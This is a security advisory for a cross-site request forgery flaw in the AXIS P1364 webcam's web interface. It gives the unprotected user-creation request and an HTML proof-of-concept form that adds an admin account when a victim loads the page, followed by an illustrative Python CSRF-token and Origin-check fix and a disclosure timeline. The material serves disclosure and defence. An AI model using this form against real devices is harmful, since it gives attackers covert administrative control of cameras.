usd-2023-0007 | AXIS P1364 - Webcam - Cross-Site Request Forgery (CSRF)

Advisory ID: usd-2023-0007
Product: AXIS P1364 - Webcam
Affected Version: AXIS OS 9.80.12
Vulnerability Type: Cross-Site Request Forgery (CSRF) (CWE-352)
Security Risk: High
Vendor URL:
Vendor acknowledged vulnerability: No, CSRF vulnerabilities are out of scope according to their vulnerability management policy
Vendor Status: Not fixed
CVE number: Not requested yet
CVE Link: Not requested yet

Description

A CSRF vulnerability in the web interface of the AXIS P1364 allows an attacker to create a new admin account.

Proof of Concept

The application fails to protect critical actions against CSRF attacks.
The following request creates a new user in the AXIS camera and does not contain protection mechanisms against CSRF.

POST /axis-cgi/pwdgrp.cgi HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: [REDACTED]
Connection: close
Authorization: Digest username="root", realm="AX[...]

The following HTML builds a malicious website that creates a new admin account once the victim visits it.

  <script>history.pushState('', '', '/')</script>
  <!-- Same fields as the unprotected pwdgrp.cgi request shown above -->
  <form action="https://[REDACTED]/axis-cgi/pwdgrp.cgi" method="POST">
    <input type="hidden" name="action" value="add" />
    <input type="hidden" name="user" value="pentestcsrf" />
    <input type="hidden" name="pwd" value="changeme1234!" />
    <input type="hidden" name="grp" value="users" />
    <input type="hidden" name="strict_pwd" value="1" />
    <input type="hidden" name="sgrp" value="viewer:operator:admin&#58;" />
    <input type="submit" value="Submit request" />
  </form>

Fix

Implement unique CSRF tokens for state-changing requests.
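As an added example that is not part of the advisory and not Axis code, the following Python shows the kind of server-side check the fix calls for: a per-session CSRF token validated on every state-changing request, with an Origin/Referer check as defence in depth. It is applied to a request shaped like the unprotected pwdgrp.cgi call above. The secret, the trusted origin, the session identifier and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Assumed per-device secret; a real deployment generates it at first boot and
# keeps it out of source. Regenerated on every import here, which is fine for a demo.
SERVER_SECRET = secrets.token_bytes(32)

# Assumed origin of the camera's own web interface.
TRUSTED_ORIGIN = "https://camera.example.internal"

# Form body of the unprotected request from the advisory (field names and values
# as shown on the page), used here only as the input the check must reject.
POC_FORM = {
    "action": "add",
    "user": "pentestcsrf",
    "pwd": "changeme1234!",
    "grp": "users",
    "strict_pwd": "1",
    "sgrp": "viewer:operator:admin",
}


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token bound to the session: nonce || HMAC-SHA256(secret, nonce:session_id).

    Binding to the session id means a token obtained in the attacker's own
    session is useless against a victim's session, and nothing has to be stored
    server-side (the HMAC-based token pattern).
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{nonce}:{session_id}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(token: str, session_id: str, secret: bytes = SERVER_SECRET) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{nonce}:{session_id}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_is_trusted(headers: Dict[str, str]) -> bool:
    """Defence in depth: a cross-site form post carries the other site's Origin
    (or, where a browser omits Origin, its Referer); either must match our own origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == TRUSTED_ORIGIN


def authorize_state_change(method: str, headers: Dict[str, str], form: Dict[str, str],
                           session_id: str) -> Tuple[bool, str]:
    """Gate a CGI such as pwdgrp.cgi would run before touching the user database.

    Assumes the handler only mutates state on POST; if it also honoured GET,
    the safe-method shortcut below would have to go.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    if not origin_is_trusted(headers):
        return False, "origin check failed"
    token = form.get("csrf_token")
    if token is None or not token_is_valid(token, session_id):
        return False, "missing or invalid csrf token"
    return True, "ok"


if __name__ == "__main__":
    session = "sess-victim"
    # The advisory's PoC shape: POST from another site, no token -> rejected.
    print(authorize_state_change("POST", {"Origin": "https://attacker.example"}, POC_FORM, session))
    # Same fields submitted by the camera's own UI with a token for this session -> accepted.
    legit = dict(POC_FORM, csrf_token=issue_csrf_token(session))
    print(authorize_state_change("POST", {"Origin": TRUSTED_ORIGIN}, legit, session))
```

The two checks fail independently: the PoC form is refused on the Origin check before the token is even looked at, and a token issued for one session is refused in another, which is what stops a token the attacker collected in their own session from being replayed against the victim.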


Timeline

  • 2023-03-08: First attempt to contact the vendor via e-mail.
  • 2023-03-22: Second attempt to contact the vendor via e-mail.
  • 2023-06-05: The vendor replies that CSRF vulnerabilities are out of scope according to their vulnerability management policy.
  • 2024-06-27: This advisory is published.

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.